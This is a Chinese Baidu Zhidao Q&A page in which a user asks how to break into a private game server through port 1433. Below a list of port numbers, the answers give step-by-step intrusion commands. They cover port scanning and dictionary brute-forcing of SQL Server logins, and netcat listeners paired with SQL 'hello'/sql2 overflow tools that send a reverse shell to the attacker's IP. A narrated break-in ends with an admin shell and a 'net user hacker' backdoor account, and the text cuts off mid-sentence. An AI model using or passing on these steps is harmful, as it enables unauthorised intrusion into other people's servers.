传奇SF除了135.137.139外端口都开着,1433什么的怎么进?急

来源:百度知道 编辑:UC知道 时间:2024/09/22 06:50:53
传奇SF除了135.137.139外端口都开着,1433什么的怎么进
441 decvms-sysmgt
442 cvc_hostd
443 安全服务
444 snpp
446 ddm-rdb
447 ddm-dfm
448 ddm-ssl
449 as-servermap
450 tserver
451 sfs-smp-net
452 452 号端口
453 creativeserver
454 contentserver
455 creativepartnr
456 Hackers
457 scohelp
458 appleqtc
459 ampr-rcmd
460 skronk
747 fujitsu-dev
748 ris-cm
749 kerberos-adm
750 rfile
751 pump
752 qrh
753 rrh
754 tell send
755 755 号端口
756 756 号端口
757 757 号端口
758 nlogin
759 con
760 ns
761 rxe
762 quotad
763 cycleserv
764 omserv
765 webster
766 766 号端口
767 767 号端口
768 768 号端口

晕,1433是n年前的了,现在入侵很难,漏洞一出很快就补上了,等机会吧

端口入侵很难找到了,不过也有粗心的网管
scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

久违的溢出工具

用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12